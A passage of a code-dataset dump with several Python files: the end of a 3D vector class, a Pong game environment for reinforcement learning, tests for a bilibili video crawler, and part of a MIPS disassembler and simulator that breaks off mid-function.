ans[i] = -1 * self[i]\n return ans\n\n # 絶対値\n def abs(self):\n x2 = self[0] * self[0]\n y2 = self[1] * self[1]\n z2 = self[2] * self[2]\n return sqrt(x2 + y2 + z2)\n\n # 内積\n def dot(self, other):\n # 例外処理\n if not isinstance(other, VECTOR):\n raise TypeError\n\n ans = 0.0\n for i in range(0, 3) :\n ans += self[i] * other[i]\n\n return ans\n\n # 外積\n def __mul__(self, other):\n # 引数がスカラーだった時はスカラー倍に\n if not isinstance(other, VECTOR):\n if isinstance(other, int) or isinstance(other, float) :\n return (other * self)\n elif isinstance(other, MATRIX) :\n return (other * self)\n else:\n raise TypeError\n\n ans = VECTOR()\n ans[0] = self[1] * other[2] - self[2] * other[1]\n ans[1] = self[2] * other[0] - self[0] * other[2]\n ans[2] = self[0] + other[1] - self[1] * other[0]\n return ans\n\n # スカラー倍\n def __rmul__(self, r):\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = r * self[i]\n\n return ans\n\n # 正規化\n def normal(self):\n ans = VECTOR()\n mag = self.abs()\n for i in range(0, 3) :\n ans[i] = self[i] / mag\n\n return ans\n\n # 表示形式\n def __repr__(self):\n return (\"v:\" + list.__repr__(self))\n","sub_path":"geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211942129","text":"import logging\nimport numpy as np\nfrom pyglet.gl import *\nfrom pyglet.gl import *\nfrom .GameAbstract import GameAbstract\nfrom .GameObjectsPyglet.App import App\nfrom .GameObjectsPyglet.Rect import Rect\n\nlog = logging.getLogger( __name__ )\nlog.addHandler( logging.StreamHandler( ) )\nlog.setLevel( logging.DEBUG )\n\n\nclass PongGame( GameAbstract ):\n\n def __init__( self ):\n self._curr_key_press = [ ]\n self._game_time = 0.0\n self.no_action_idx = 1\n self.quit = False\n self.randomise_ball_start = True\n\n # ==============================================\n # OPTIONS\n # ==============================================\n self.points_to_win = 20.\n\n self.reward_hit_paddle = 0\n self.reward_hit_oponents_paddle = 0\n self.reward_conceded = -1\n self.reward_scored = 1\n\n self.ball_speed_x = 7.\n self.ball_speed_y = 7.\n\n # self.player1_speed = 12.\n # self.player2_speed = 32.\n self.player1_speed = 22.\n self.player2_speed = 22.\n\n self.left_wall_pos = 5.\n self.right_wall_pos = 620.\n self.bottom_wall_pos = 10.\n self.top_wall_pos = 457.5\n\n self.player_width = 10.\n self.player_height = 50.\n self.player_max_y = 420.\n self.player_min_y = 10.\n\n self.player1_start_x = 10.\n self.player2_start_x = self.right_wall_pos\n self.player_start_y = 215.\n\n self.window_width = 640\n self.window_height = 480\n self.border_size = 5.\n\n self.ball_start_y = 232.5\n self.ball_start_x = 307.5\n\n self.ball_diameter = 15.\n\n self.text_colour = [ 255, 255, 255 ]\n self.line_colour = [ 255, 255, 255 ]\n self.ball_colour = [ 255, 255, 255 ]\n self.background_colour = [ 0, 0, 0 ]\n self.player1_colour = [ 255, 0, 255 ]\n self.player2_colour = [ 255, 0, 0 ]\n\n # ==============================================\n\n self.ball_radius = self.ball_diameter / 2.\n\n self.pitch_size_x = self.window_width - (self.border_size * 2.)\n self.pitch_size_y = self.window_height - (self.border_size * 2.)\n\n self.pitch_centre_x = self.window_width / 2.\n self.pitch_centre_y = self.window_height / 2.\n\n self._create_game_objects( )\n\n def _create_game_objects( self ):\n self.score1 = pyglet.text.Label( '0', font_name='calibri', font_size=24,\n x=self.pitch_centre_x - 50., y=self.pitch_centre_y, anchor_x='center',\n anchor_y='center', color=[ 255, 255, 255, 255 ] )\n\n self.score2 = pyglet.text.Label( '0', font_name='calibri', font_size=24,\n x=self.pitch_centre_x + 50., y=self.pitch_centre_y, anchor_x='center',\n anchor_y='center', color=[ 255, 255, 255, 255 ] )\n\n self.background = Rect( pos=[ 0, 0 ], width=[ self.window_width, self.window_height ],\n colour=self.background_colour )\n self.player1 = Rect( pos=[ self.player1_start_x, self.player_start_y ],\n width=[ self.player_width, self.player_height ], colour=self.player1_colour )\n self.player2 = Rect( pos=[ self.player2_start_x, self.player_start_y ],\n width=[ self.player_width, self.player_height ], colour=self.player2_colour )\n self.ball = Rect( pos=[ self.ball_start_x, self.ball_start_y ],\n width=[ self.ball_diameter, self.ball_diameter ], colour=self.ball_colour )\n self.middle_line = Rect( pos=[ self.pitch_centre_x - 1, self.border_size ],\n width=[ 2, self.window_height - (2 * self.border_size) ], colour=self.line_colour )\n\n self.player1_score, self.player2_score = 0, 0\n self.player1_dir = 0.\n\n def set_next_action( self, action_index=None ):\n self._calc_key_from_action_array( action_index )\n\n def _calc_key_from_action_array( self, action_set ):\n if action_set[ 1 ] == 1:\n self.player1.inc_pos( 0, self.player1_speed )\n elif action_set[ 2 ] == 1:\n self.player1.inc_pos( 0, -self.player1_speed )\n\n def set_player1_speed( self, speed ):\n self.player1_speed = speed\n\n def update( self ):\n reward = 0\n\n # MOVE BALL\n self.ball.inc_pos( self.ball_speed_x, self.ball_speed_y )\n\n # HARD CODED AI\n if self.ball.x >= (self.pitch_centre_x - self.ball_diameter):\n if not self.player2.y == self.ball.y + self.ball_radius:\n if self.player2.y < self.ball.y + self.ball_radius:\n self.player2.y += self.player2_speed\n if self.player2.y > self.ball.y - (self.player_height - self.ball_radius):\n self.player2.y -= self.player2_speed\n\n # BOUNDS CHECKING\n self.player1.y = min(self.player1.y, self.player_max_y)\n self.player1.y = max(self.player1.y, self.player_min_y)\n self.player2.y = min(self.player2.y, self.player_max_y)\n self.player2.y = max(self.player2.y, self.player_min_y)\n\n # COLLISIONS WITH LEFT PADDLE\n if self.ball.x <= self.player1.x + self.player_width:\n if (self.ball.y >= (self.player1.y - self.ball_radius)) and \\\n (self.ball.y <= (self.player1.y + (self.player_height - self.ball_radius))):\n self.ball.x = self.player1.x + self.player_width\n self.ball_speed_x = -self.ball_speed_x\n reward = self.reward_hit_paddle\n\n # COLLISIONS WITH RIGHT PADDLE\n if self.ball.x >= self.player2.x - self.ball_diameter:\n if (self.ball.y >= (self.player2.y - self.ball_radius)) and \\\n (self.ball.y <= (self.player2.y + (self.player_height - self.ball_radius))):\n self.ball.x = self.player2.x - self.ball_diameter\n self.ball_speed_x = -self.ball_speed_x\n reward = self.reward_hit_oponents_paddle\n\n # CHECK IF SCORED\n if self.ball.x < self.left_wall_pos:\n self.player2_score += 1\n self.score2.text = str( self.player2_score )\n self._reset_ball_player1_defending( )\n self.player1.y, self.player2.y = self.player_start_y, self.player_start_y\n reward = self.reward_conceded\n elif self.ball.x > (self.right_wall_pos - self.ball_diameter):\n self.player1_score += 1\n self.score1.text = str( self.player1_score )\n self._reset_ball_player2_defending( )\n self.player1.y, self.player2.y = self.player_start_y, self.player_start_y\n reward = self.reward_scored\n\n # COLLISIONS WITH TOP AND BOTTOM WALLS\n if self.ball.y <= self.bottom_wall_pos:\n self.ball_speed_y = -self.ball_speed_y\n self.ball.y = self.bottom_wall_pos\n elif self.ball.y >= self.top_wall_pos:\n self.ball_speed_y = -self.ball_speed_y\n self.ball.y = self.top_wall_pos\n\n terminal = False\n if max( self.player1_score, self.player2_score ) >= self.points_to_win:\n terminal = True\n\n return float( reward ), terminal\n\n def observe( self ):\n if self.first_frame:\n self.first_frame = False\n terminal = False\n else:\n self.reward, terminal = self.update( )\n\n self.render( )\n\n return terminal\n\n def get_reward( self ):\n return self.reward\n\n def should_quit( self ):\n return self.quit\n\n def start_new_episode( self ):\n self.quit = False\n self.player1_score = 0\n self.player2_score = 0\n\n self.score1.text = str( self.player1_score )\n self.score2.text = str( self.player2_score )\n self.reward = 0.0\n self.first_frame = True\n self.player1.y, self.player2.y = self.player_start_y, self.player_start_y\n self.observe( )\n\n def render( self ):\n # DRAW BACKGROUND\n self.background.draw( )\n\n # DRAW FRAME\n self.middle_line.draw( )\n\n # DRAW PADDLES\n self.player1.draw( )\n self.player2.draw( )\n\n # DRAW BALL\n self.ball.draw( )\n\n # DRAW SCORES\n self.score1.draw( )\n self.score2.draw( )\n\n def _reset_ball_player1_defending( self ):\n if self.randomise_ball_start:\n random_y_offset = np.random.uniform( self.bottom_wall_pos, (self.top_wall_pos - self.ball_diameter) )\n self.ball.x, self.ball.y = self.pitch_centre_x, random_y_offset\n else:\n self.ball.x, self.ball.y = self.ball_start_x, self.ball_start_y\n\n def _reset_ball_player2_defending( self ):\n if self.randomise_ball_start:\n random_y_offset = np.random.uniform( self.bottom_wall_pos, (self.top_wall_pos - self.ball_diameter) )\n self.ball.x, self.ball.y = (self.pitch_centre_x - self.ball_diameter), random_y_offset\n else:\n self.ball.x, self.ball.y = self.ball_start_x, self.ball_start_y\n\n def stop_game( self ):\n pass\n\n @staticmethod\n def get_instance( visible=True ):\n # visible = False, not currently working\n return App( PongGame( ), visible=visible )","sub_path":"ReinforcementLearning/GamesAsync/PongGame.py","file_name":"PongGame.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562007509","text":"import os\nimport sys\n__root = os.path.abspath(\n os.path.dirname(os.path.abspath(__file__)) + (os.sep + '..') * (\n len(os.path.dirname(os.path.abspath(__file__)).split(os.sep)) -\n os.path.dirname(os.path.abspath(__file__)).split(os.sep).index(\n 'VeXtract'\n ) - 1\n )) + os.sep\nsys.path.append(__root)\nimport pytest\nimport xml.etree.ElementTree as ET\n\nfrom crawler.bilibili import bilibili\n\nfrom helper import logger\nlog = logger.Logger(__name__)\n\nAV_NUMBER_ONE_P = \"av23315808\"\nAV_NUMBER_MANY_P = \"av13392824\"\n\n\ndef test_fetch_bilibili():\n log.d('start test_fetch_bilibili')\n target = bilibili.fetch_bilibili_av(AV_NUMBER_MANY_P, \"1\")\n cid_need = ['21945130', '21945131']\n tags_need = [\"凹凸世界\", \"社会摇\", \"格瑞\", \"toxic\"]\n assert target.aid == \"13392824\"\n assert [i for i in target.cid if i not in cid_need] == []\n assert target.video_title == \"【凹凸世界】瑞骚来袭!手办级渲染第四弹!toxic伪\"\n assert [i for i in target.video_tags if i not in tags_need] == []\n assert target.timelength == 110419\n\n\ndef test_j_data_rw():\n log.d('start test_j_data_rw')\n a = bilibili.Bilibili_file_info.load(os.path.join(__root, \"test\\\\test_file\\\\{}.json\".format(AV_NUMBER_ONE_P)))\n assert a.comments[a.cid[0]][0][\"score\"] == None\n a.comments[a.cid[0]][0][\"score\"] = 10\n a.save(os.path.join(__root, \"test\\\\test_file\\\\\"))\n b = bilibili.Bilibili_file_info.load(os.path.join(__root, \"test\\\\test_file\\\\{}.json\".format(AV_NUMBER_ONE_P)))\n assert b.comments[b.cid[0]][0][\"score\"] == 10\n b.comments[b.cid[0]][0][\"score\"] = None\n b.save(os.path.join(__root, \"test\\\\test_file\\\\\"))\n ","sub_path":"test/crawler/bilibili/bilibili_info_test.py","file_name":"bilibili_info_test.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"325339533","text":"# -*- coding: cp1252 -*-\r\nimport sys\r\nimport os\r\nimport struct\r\n\r\ncycle = 1\r\ndataStartPoint = 0\r\naddressList = []\r\nfuncBits = []\r\ndisOut = None\r\nsimOut = None\r\nimm = 0\r\n\r\n# convert ints to signed\r\ndef imm16BitUnsignedTo32BitSignedConverter( num ):\r\n\tnegBitMask = 0x00008000\r\n\t# if the 16th bit is 1, the 16 bit value is negative\r\n\tif( negBitMask & num ) > 0 :\r\n\t# put 1s in the upper 16 bits\r\n\t\tnum = num | 0xFFFF0000\r\n\t\t# now perform a 2's complement conversion\r\n\t\t# flip the bits using XOR\r\n\t\tnum = num ^ 0xFFFFFFFF\r\n\t\t# add 1\r\n\t\tnum = num + 1\r\n\t\t# num is now the positive version of the number\r\n\t\t# multiply by -1 to get a signed integer with the negative number\r\n\t\tnum = num * -1\r\n\treturn num\r\n\r\ndef readFromFile(opCode, rsBits, instructions, immediate):\r\n\t# how to read binary file and get ints\r\n\tinFile = open( sys.argv[1], 'rb' )\r\n\t# get the file length\r\n\tinFileLen = os.stat( sys.argv[1] )[6]\r\n\tinFileWords = inFileLen / 4\r\n\taddress = []\r\n\t# read the words from the file\r\n\tfor i in range( inFileWords ) :\r\n\t\t# print 'Original: ' + str(struct.unpack('>I', inFile.read(4))[0])\r\n\t\tinstructions.append( struct.unpack('>I', inFile.read(4))[0] )\r\n\t\taddress.append( 96 + (i*4) )\r\n\t\t# use I to hold the current instruction\r\n\t\tI = instructions[ len(instructions)-1 ]\r\n\t\t# get IMMEDIATE bits\r\n\t\tIMM = ((I << 16) & 0xFFFFFFFF ) >> 16\r\n\t\tIMM = imm16BitUnsignedTo32BitSignedConverter( IMM )\r\n\t\t#print bin(I)\r\n\t\t# get the opcode bits\r\n\t\tOP = I>>26\r\n\t\topCode.append(OP)\r\n\t\t#print OP\r\n\t\t# get the RS bits\r\n\t\tRS = ((I<<6) & 0xFFFFFFFF) >> 27\r\n\t\t#print RS\r\n\t\trsBits.append(RS)\r\n\t\t#print '----'\r\n\t\timmediate.append(bin(IMM))\r\n\tinFile.close()\r\n\treturn address\r\n\r\ndef initializeFuncCodes(instructions):\r\n\tfuncBits = []\r\n\tfor x in range(0, len(instructions)):\r\n\t\tfuncCode = int(bin(instructions[x])[-6:], 2)\r\n\t\tfuncBits.append(funcCode)\r\n\treturn funcBits\r\n\t\r\ndef initializeOPCodes():\r\n\tinstructions = [[int('100010', 2), None, 'J'], [int('100000', 2), int('001000', 2), 'JR'], [int('100100', 2), None, 'BEQ'],\r\n\t\t\t\t\t[int('100001', 2), None, 'BLTZ'], [int('100000', 2), int('100000', 2), 'ADD'], [int('101000', 2), None, 'ADDI'],\r\n\t\t\t\t\t[int('100000', 2), int('100010', 2), 'SUB'], [int('101011', 2), None, 'SW'], [int('100011', 2), None, 'LW'],\r\n\t\t\t\t\t[int('100000', 2), int('000000', 2), 'SLL'], [int('100000', 2), int('000010', 2), 'SRL'], [int('111100', 2), None, 'MUL'],\r\n\t\t\t\t\t[int('100000', 2), int('100100', 2), 'AND'], [int('100000', 2), int('100101', 2), 'OR'], [int('100000', 2), int('001010', 2), 'MOVZ'],\r\n\t\t\t\t\t[int('100000', 2), int('001101', 2), 'BREAK'], [int('100000', 2), int('000000', 2), 'NOP']] #nop is sll 0,0,0\r\n\t\t\t\t\t#first six bits is normally opcode, however 1-5 will be used instead\r\n\t\t\t\r\n\treturn instructions\r\n\r\ndef checkOPCode(opCode, stdOPCodes):\r\n\tvalidity = []\r\n\tvalid = False\r\n\tfor x in range(0, len(opCode)):\r\n\t\tvalid = False\r\n\t\tfor y in range(0, len(stdOPCodes)):\r\n\t\t\tif (opCode[x] == stdOPCodes[y][0]):\r\n\t\t\t\tvalid = True\r\n\t\t\t\ty = len(stdOPCodes)\r\n\t\tvalidity.append(valid)\t\t\t \r\n\treturn validity\r\ndef getData(data, validity, instructions):\r\n\tlocation = 0\r\n\tstartPt = len(validity) - 1\r\n\twhile (startPt >= 0):\r\n\t\tif (validity[startPt]):\r\n\t\t\tlocation = startPt + 1\r\n\t\t\tstartPt = -1\r\n\t\tstartPt = startPt - 1\r\n\treturnPT = location\r\n\t#now that we have the starting location for the data, we can decide the data values\r\n\twhile (location < len(validity)):\r\n\t\tif (int(instructions[location]) > 2147483647):\r\n\t\t\tdataPt = twosComplement(instructions[location], 32)\r\n\t\telse:\r\n\t\t\tdataPt = int(instructions[location])\r\n\t\tdata.append(int(dataPt))\r\n\t\tlocation = location + 1\r\n\treturn returnPT\r\n\r\ndef twosComplement(value, bits):\r\n\tif ((value & (1 << (bits - 1))) != 0):\r\n\t\tvalue = value - (1 << bits)\r\n\treturn value\r\n\r\ndef initializeDisCheck(instructions):\r\n\tnewList = [[None for row in range(0, len(instructions))] for col in range(0, len(instructions))]\r\n\t\r\n\tfor i in range(0, len(instructions)):\r\n\t\tnewList[i][0] = instructions[i]\r\n\t\tnewList[i][1] = False\r\n\treturn newList\r\n\t\r\ndef determineInstruction(instruction, opCode, funcBits, stdOPCodes, validity, endPT, data, registers, addresses, out1, out2, immediate):\r\n\tglobal cycle\r\n\tcycle = 1\r\n\tdata2 = data\r\n\tdataStartPoint = endPT + 1\r\n\tglobal addressList\r\n\taddressList = addresses\r\n\tdisCheck = initializeDisCheck(instruction)\r\n\t#Here comes the long list of instruction options\r\n\tfor x in range(0, endPT):\r\n\t\tif (validity[x] != True):\r\n\t\t\tprintInvalid(instruction[x], addresses[x], out1)\r\n\t\t#handle ones dealing with func next\r\n\t\telif (opCode[x] == int('100000', 2)):\r\n\t\t\tif (funcBits[x] == stdOPCodes[1][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'JR', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[4][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'ADD', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[6][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SUB', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[9][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SLL', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[10][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SRL', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[12][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'AND', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[13][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'OR', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[14][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'MOVZ', data2, addresses[x], out1, endPT)\r\n\t\t\telif (funcBits[x] == stdOPCodes[15][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'BREAK', data2, addresses[x], out1, endPT)\r\n\t\t\t\tprintDisData(instruction, addresses, data2, x, out1)\r\n\t\t\telif (funcBits[x] == stdOPCodes[16][1]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'NOP', data2, addresses[x], out1, endPT)\r\n\t\t\t#handle all other cases next\r\n\t\telse:\r\n\t\t\tif (opCode[x] == stdOPCodes[0][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'J', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[11][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'MUL', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[2][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'BEQ', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[3][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'BLTZ', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[5][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'ADDI', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[7][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'SW', data2, addresses[x], out1, endPT)\r\n\t\t\telif (opCode[x] == stdOPCodes[8][0]):\r\n\t\t\t\tprintDis(instruction[x], registers, 'LW', data2, addresses[x], out1, endPT)\r\n\tx = 0\r\n\twhile (x < endPT):\r\n\t\t#handle ones dealing with func next\r\n\t\tif (validity[x] != True):\r\n\t\t\tcycle = cycle #needed a do nothing line so that cycle wouldn't get changed\r\n\t\telif (opCode[x] == int('100000', 2)):\r\n\t\t\tif (funcBits[x] == stdOPCodes[1][1]):\r\n\t\t\t\tx = JR(instruction[x], registers, addresses, data, addresses[x], out1, out2, endPT, data2, x, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[4][1]):\r\n\t\t\t\tADD(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[6][1]):\r\n\t\t\t\tSUB(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[9][1]):\r\n\t\t\t\tSLL(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[10][1]):\r\n\t\t\t\tSRL(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[12][1]):\r\n\t\t\t\tAND(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[13][1]):\r\n\t\t\t\tOR(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[14][1]):\r\n\t\t\t\tMOVZ(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[15][1]):\r\n\t\t\t\tBREAK(instruction[x], registers, addresses[x], data, out1, out2, endPT, addresses, x, instruction, data2, disCheck)\r\n\t\t\telif (funcBits[x] == stdOPCodes[16][1]):\r\n\t\t\t\tx = SLL(instruction[x], registers, addresses, data, data2, disCheck)\r\n\t\t\tcycle = cycle + 1\r\n\t\t\t#handle all other cases next\r\n\t\telse:\r\n\t\t\tif (opCode[x] == stdOPCodes[0][0]):\r\n\t\t\t\tx = J(instruction[x], registers, addresses, data, addresses[x],out1,out2,endPT, data2, x, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[11][0]):\r\n\t\t\t\tMUL(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[2][0]):\r\n\t\t\t\tx = BEQ(instruction[x], registers, addresses, addresses[x], data, out1, out2, endPT, data2, x, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[3][0]):\r\n\t\t\t\tx = BLTZ(instruction[x], registers, addresses, addresses[x], data, out1, out2, endPT, data2, x, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[5][0]):\r\n\t\t\t\tglobal imm\r\n\t\t\t\timm = immediate[x]\r\n\t\t\t\tADDI(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[7][0]):\r\n\t\t\t\tSW(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, addresses, disCheck)\r\n\t\t\telif (opCode[x] == stdOPCodes[8][0]):\r\n\t\t\t\tLW(instruction[x], registers, data, addresses[x], out1, out2, endPT, data2, addresses, disCheck)\r\n\t\t\tcycle = cycle + 1\r\n\t\tx = x + 1\r\n\t\t\t\t\r\n\t\r\ndef ADD(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\t#ins is the full instruction.\r\n\t#rs is at 25-21, rt is at 20-16, rd is at 15-11\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'ADD'\r\n\t\r\n\tregisters[int(rd)] = registers[int(rs)] + registers[int(rt)]\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef ADDI(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\top = 'ADDI'\r\n\t\r\n\tglobal imm\r\n\timm = int(imm,2)\r\n\r\n\tregisters[int(rt)] = str((int(registers[rs]) + imm))\r\n\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef SUB(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'SUB'\r\n\t\r\n\tregisters[int(rd)] = registers[int(rs)] - registers[int(rt)]\r\n\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef MUL(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'MUL'\r\n\t\r\n\tregisters[int(rd)] = registers[int(rs)] * registers[int(rt)]\r\n\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef MOVZ(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'MOVZ'\r\n\r\n\tif (int(registers[int(rt)]) == 0):\r\n\t\tregisters[int(rd)] = registers[int(rs)]\r\n\t\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef J(ins, registers, addresses, data, address, out1, out2, endPt, data2, x, disCheck):\r\n\t#jumps to location 4*bin\r\n\taddr = bin(ins)[8:]\r\n\taddr = int(addr, 2)\r\n\taddr = addr * 4\r\n\top = 'J'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tfor y in range(0, len(addresses)):\r\n\t\tif (int(addr) == addresses[y]):\r\n\t\t\treturn (y - 1)\r\n\treturn x\t\r\n\t\t\r\ndef JR(ins, registers, addresses, data, address, out1, out2, endPt, data2, x, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\taddr = registers[rs]\r\n\top = 'JR'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tfor x in range(0, len(addresses)):\r\n\t\tif (int(addr) == addresses[x]):\r\n\t\t\treturn (x - 1)\r\n\treturn x\r\n\t\t\r\ndef BEQ(ins, registers, addresses, address, data, out1, out2, endPt, data2, x, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\timm = (int(str(bin(ins)[18:]),2) * (2 ** 2))\r\n\top = 'BEQ'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tif (rs == rt):\r\n\t\tnewAddress = (imm + 4 + address)\r\n\t\tfor y in range(0, len(addresses)):\r\n\t\t\tif (newAddress == addresses[y]):\r\n\t\t\t\treturn (y - 1)\r\n\telse:\r\n\t\treturn x\r\n\t\r\ndef BLTZ(ins, registers, addresses, address, data, out1, out2, endPt, data2, x, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\timm = (int(str(bin(ins)[18:]),2) * (2 ** 2))\r\n\top = 'BLTZ'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\n\tif (int(registers[int(rs)]) < 0):\r\n\t\tnewAddress = (imm + 4 + address)\r\n\t\tfor y in range(0, len(addresses)):\r\n\t\t\tif (newAddress == int(addresses[y])):\r\n\t\t\t\treturn (y - 1)\r\n\telse:\r\n\t\treturn x\r\n\t\r\ndef SW(ins, registers, data, address, out1, out2, endPt, data2, addresses, disCheck):\r\n\tbase = registers[int(str(bin(ins)[8:13]),2)]\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\toffset = int(str(bin(ins))[18:],2)\r\n\tlocation = int(base) + int(offset)\r\n\top = 'SW'\r\n\t\r\n\tfor x in range(0, len(addresses)):\r\n\t\tif (location == addresses[x]):\r\n\t\t\tlocation = (x - endPt)\r\n\t\r\n\tdata[int(location)] = registers[int(rt)]\r\n\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef LW(ins, registers, data, address, out1, out2, endPt, data2, addresses, disCheck):\r\n\tbase = str(bin(ins)[8:13])\r\n\tbase = int(base,2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\toffset = int(str(bin(ins))[18:],2)\r\n\tlocation = int(str(registers[int(base)])) + int(offset)\r\n\top = 'LW'\r\n\t\r\n\tfor x in range(endPt, len(addresses)):\r\n\t\tif (location == addresses[x]):\r\n\t\t\tlocation = (x - endPt)\r\n\t\r\n\tregisters[int(rt)] = data[int(location)]\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef SLL(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\tshamt = int(str(bin(ins))[23:28],2)\r\n\t\r\n\tif (int(rs) == 0 and int(rd) == 0 and int(rt) == 0):\r\n\t\t#NOP handling...\r\n\t\top = 'NOP'\r\n\t\t\r\n\telse:\r\n\t\top = 'SLL'\r\n\t\tregisters[int(rd)] = (int(int(registers[int(rt)])) * (2**(int(shamt))))\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef SRL(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\tshamt = int(str(bin(ins))[23:28],2)\r\n\top = 'SRL'\r\n\t\r\n\tregisters[int(rd)] = (registers[int(rt)] >> int(shamt))\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef AND(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = 